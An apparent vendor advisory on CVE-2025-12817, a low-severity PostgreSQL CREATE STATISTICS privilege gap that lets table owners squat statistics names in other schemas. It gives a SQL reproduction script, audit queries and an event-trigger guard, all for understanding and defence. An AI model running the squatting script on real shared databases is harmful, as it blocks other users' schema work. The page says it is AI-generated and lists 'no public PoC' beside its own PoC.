
CVE-2025-12817: Low Vulnerability in PostgreSQL CREATE STATISTICS Command

CVE-2025-12817 is a low-severity vulnerability in PostgreSQL that lets a table owner disrupt other users of CREATE STATISTICS by squatting statistics-object names in schemas they have no CREATE privilege on. The impact is a limited denial of service, so remediation can be scheduled with a regular minor-version upgrade rather than treated as an emergency.

LOW · CVSS 3.1 · Published November 13, 2025


CVE-2025-12817 is classified as a low-severity vulnerability with a CVSS score of 3.1. Because CREATE STATISTICS did not check CREATE privilege on the target schema, any table owner could create a statistics object under any schema name, including schemas they are not allowed to create objects in. A later CREATE STATISTICS with the same qualified name, issued by a user who legitimately holds CREATE privilege on that schema, then fails because the name is already taken. This is a denial of service against other CREATE STATISTICS users, and it matters most in shared or multi-tenant databases where several roles create statistics in the same schemas.

The vulnerability affects versions prior to PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23. As this issue is classified as low severity, organizations should consider the potential impact on their systems and evaluate the need for remediation based on their specific usage of PostgreSQL.

Currently, there is no known public exploit for this vulnerability, and it is not known to be exploited in the wild. Fixed releases are already available (PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23), so organizations should plan the corresponding minor-version upgrade and, until then, audit existing statistics objects for names created by roles that lack CREATE privilege on the containing schema.

Organizations should prioritize patching PostgreSQL versions to prevent potential disruptions caused by this vulnerability. Although the urgency is classified as low, addressing this issue can help maintain system integrity and availability.

Vulnerability Details

CVE-2025-12817 is a missing authorization check in the PostgreSQL CREATE STATISTICS command. CREATE STATISTICS requires ownership of the table whose columns are being described, but before the fix it did not verify that the caller holds CREATE privilege on the schema in which the statistics object is placed. A table owner could therefore create a statistics object in any schema, pre-occupying a name that a legitimate user of that schema later needs. Only the owner of the statistics object (or a superuser) can drop it, so the legitimate user cannot clear the conflict themselves. All versions prior to PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23 are affected.

The CVSS score of 3.1 (vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L) reflects high attack complexity and low privileges required. Only availability is affected, and only for users who try to create a statistics object with the same qualified name.

Technical Analysis

The root cause of this vulnerability is the absence of a schema CREATE privilege check in the CREATE STATISTICS code path. An attacker who owns any table, regardless of which schema that table lives in, can create statistics objects with names that other users intend to use, in schemas the attacker otherwise has no right to create objects in, and thereby block those users' CREATE STATISTICS commands. The fixed releases add the schema privilege check, so the attacker's command now fails with a permission error instead.

The attack vector is network-based, since it is exercised over an ordinary database connection. The attack complexity is rated high, and the privileges required are low: the attacker needs a login role that owns at least one table, not any privilege on the target schema. User interaction is not required.

Regarding the impacts, confidentiality remains unaffected, while integrity is also not compromised. However, availability may be impacted due to the nature of the denial of service potential. This highlights the need for organizations to be vigilant about their PostgreSQL configurations and user privileges.
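The following script reproduces the scenario described in the sections above. It is an added example for this page, not code from PostgreSQL or from the CVE advisory; the role names alice and bob, the schema names alice and app, and the statistics object name orders_stats are illustrative. Run it as a superuser on a test instance; comments mark where the behaviour differs between vulnerable and fixed releases.

```sql
-- Setup (superuser). alice is the attacker: she owns a table but holds no
-- privilege on schema app. bob is the victim: he holds CREATE on schema app.
CREATE ROLE alice LOGIN;
CREATE ROLE bob   LOGIN;
CREATE SCHEMA alice AUTHORIZATION alice;   -- alice's own schema for her table
CREATE SCHEMA app;
GRANT USAGE, CREATE ON SCHEMA app TO bob;  -- bob is allowed to create in app

-- Attacker: own any table, then place a statistics object in schema app.
SET ROLE alice;
CREATE TABLE alice.scratch (a int, b int);
-- Vulnerable (< 18.1/17.7/16.11/15.15/14.20/13.23): succeeds, even though
-- alice has no CREATE (or even USAGE) privilege on schema app.
-- Fixed releases: ERROR:  permission denied for schema app
CREATE STATISTICS app.orders_stats ON a, b FROM alice.scratch;
RESET ROLE;

-- Victim: legitimately creates a table in app and wants the same stats name.
SET ROLE bob;
CREATE TABLE app.orders (customer_id int, region int);
-- On a vulnerable server where alice's object was created this fails:
-- ERROR:  statistics object "orders_stats" already exists
-- bob cannot DROP STATISTICS app.orders_stats because he does not own it.
CREATE STATISTICS app.orders_stats ON customer_id, region FROM app.orders;
RESET ROLE;

-- Cleanup by a superuser: drop the squatted object and the test fixtures.
DROP STATISTICS IF EXISTS app.orders_stats;
DROP SCHEMA app CASCADE;
DROP SCHEMA alice CASCADE;
DROP ROLE bob;
DROP ROLE alice;
```

On a fixed server the attacker's CREATE STATISTICS fails at the schema privilege check and bob's later command succeeds; on a vulnerable server the roles are reversed, which is exactly the availability impact the advisory describes. The victim can always work around the collision by choosing a different name, which is why the severity is rated low.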

Risk & Impact Analysis

The risk to organizations is a denial of service against legitimate users of CREATE STATISTICS: a squatted name makes their command fail until a superuser drops the offending object or they pick a different name. Existing queries, tables, and previously created statistics are unaffected, so the disruption is confined to schema-management workflows rather than to the applications running on the database.

The urgency for remediation, while categorized as low, should still be considered based on the operational context. The potential blast radius may vary, especially in multi-user environments where multiple users create statistics simultaneously. Organizations should assess their specific deployment of PostgreSQL and consider the implications of this vulnerability.

Given the CVSS score of 3.1 and the absence of known exploitation, organizations should still schedule remediation during their regular maintenance cycles to ensure they are using the latest supported versions.

Exploitation Status

Signal              Status
Known Exploit       No
Public PoC          No
Actively Exploited  No
Ransomware Use      No

Affected Versions

All versions prior to PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23 are affected by this vulnerability. Organizations should ensure they upgrade to the latest versions to mitigate this risk.

Mitigation & Remediation

Organizations should plan to upgrade PostgreSQL installations to versions 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23 or later. Note that schema-level privilege hardening does not help on unpatched servers, because the missing check is precisely the schema CREATE privilege. Until the upgrade is applied, the practical compensating controls are to limit which roles can log in and own tables, and to have a superuser periodically audit pg_statistic_ext for statistics objects whose owner lacks CREATE privilege on the containing schema and drop any that were not expected.

Monitoring for unusual activity related to CREATE STATISTICS commands can also be beneficial. Implementing network controls to restrict access to PostgreSQL instances can help reduce the attack surface.
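The two checks below are an added example for this page, not tooling shipped by PostgreSQL: the first reports whether the connected server's version already carries the fix, and the second lists statistics objects whose owner could not have created them legitimately under the fixed rules, which is the squatting pattern described above. Both read only built-in catalogs and functions; run them as a superuser so has_schema_privilege is evaluated for every owner.

```sql
-- 1. Is this server on a release that includes the fix for CVE-2025-12817?
--    server_version_num is MAJOR*10000 + MINOR, e.g. 17.7 -> 170007.
WITH v AS (SELECT current_setting('server_version_num')::int AS num)
SELECT num                     AS server_version_num,
       num / 10000             AS major,
       CASE num / 10000
           WHEN 18 THEN num >= 180001
           WHEN 17 THEN num >= 170007
           WHEN 16 THEN num >= 160011
           WHEN 15 THEN num >= 150015
           WHEN 14 THEN num >= 140020
           WHEN 13 THEN num >= 130023
           ELSE NULL          -- major not covered by the advisory
       END                     AS fixed_for_cve_2025_12817
FROM v;

-- 2. Statistics objects whose owner lacks CREATE on the schema they sit in.
--    On a fixed server such rows can only predate the upgrade (or be the
--    result of a later REVOKE); on a vulnerable server each one is a
--    candidate squatted name. Superusers always pass has_schema_privilege,
--    so their objects are never reported.
SELECT n.nspname AS schema_name,
       s.stxname AS statistics_object,
       r.rolname AS owner,
       c.relname AS described_table
FROM pg_statistic_ext s
JOIN pg_namespace n ON n.oid = s.stxnamespace
JOIN pg_roles     r ON r.oid = s.stxowner
JOIN pg_class     c ON c.oid = s.stxrelid
WHERE NOT has_schema_privilege(r.rolname, n.nspname, 'CREATE')
ORDER BY 1, 2;

-- 3. Remediation for a confirmed squatted object (superuser; name is an
--    example taken from the query output):
-- DROP STATISTICS app.orders_stats;
```

Rows returned by the second query are not automatically malicious, since a DBA may have revoked CREATE on a schema after statistics were created there, so confirm the owner and the described table before dropping anything.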

For further assistance, organizations can explore our penetration testing services to assess the security posture of their databases.

Detection Guidance

To detect potential exploitation of this vulnerability, log DDL on the server (log_statement = 'ddl' records every CREATE STATISTICS together with the session user and database) and review entries where the statistics object's schema differs from the schemas the issuing role normally creates objects in. Any "statistics object ... already exists" failures reported by application or migration tooling should also be investigated, since they are the victim-side symptom.

Alerting on CREATE STATISTICS issued by low-privileged roles into shared schemas is the most useful behavioural signal. Network signatures are not a realistic detection: the command is an ordinary SQL statement, usually carried over TLS, and is only distinguishable from legitimate use by the privilege relationship between the issuing role and the target schema, which is server-side state.
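Event triggers can enforce the missing check and log every CREATE STATISTICS on releases that have not yet been upgraded. The following is an added example for this page, not part of PostgreSQL or of the advisory; the function and trigger names are illustrative. It must be installed by a superuser, and an exception raised at ddl_command_end rolls the command back, so on a vulnerable server it restores the behaviour the fix introduces.

```sql
-- Compensating control and audit log for CVE-2025-12817 (example code).
-- Fires after every CREATE STATISTICS; logs it, then rejects it when the
-- issuing role lacks CREATE privilege on the target schema.
CREATE OR REPLACE FUNCTION guard_create_statistics()
RETURNS event_trigger
LANGUAGE plpgsql
AS $$
DECLARE
    cmd record;
BEGIN
    FOR cmd IN
        SELECT schema_name, object_identity
        FROM pg_event_trigger_ddl_commands()
        WHERE command_tag = 'CREATE STATISTICS'
    LOOP
        -- Audit line in the server log, independent of log_statement.
        RAISE LOG 'CREATE STATISTICS by % in schema %: %',
            current_user, cmd.schema_name, cmd.object_identity;

        -- Same rule the fixed releases apply; superusers always pass.
        IF NOT has_schema_privilege(current_user, cmd.schema_name, 'CREATE') THEN
            RAISE EXCEPTION 'permission denied for schema %', cmd.schema_name
                USING HINT = 'CVE-2025-12817 guard: CREATE privilege on the '
                             'target schema is required for CREATE STATISTICS';
        END IF;
    END LOOP;
END;
$$;

CREATE EVENT TRIGGER guard_create_statistics
    ON ddl_command_end
    WHEN TAG IN ('CREATE STATISTICS')
    EXECUTE FUNCTION guard_create_statistics();

-- Remove the guard once the server runs a fixed release:
-- DROP EVENT TRIGGER guard_create_statistics;
-- DROP FUNCTION guard_create_statistics();
```

Event triggers do not fire in single-user mode and are per-database, so install the guard in every database that untrusted table owners can connect to. The trigger only intercepts new commands; squatted objects that already exist must be found with a catalog audit and dropped by a superuser.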

AppSecure Threat Intelligence Insight

The long-term significance of CVE-2025-12817 lies in its demonstration of how missing authorization checks can lead to disruptions in database environments. Security teams should be aware of similar patterns as they assess their database permissions.

This vulnerability underscores the importance of rigorous permission management and the need for proactive security measures. To strengthen defenses, organizations can refer to our penetration testing methodology for best practices.

Additionally, recognizing the trends in vulnerabilities like this can help inform future security strategies. Organizations should consider reviewing their security posture regularly and may find benefit in exploring our vulnerability management program to better prepare for emerging risks.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
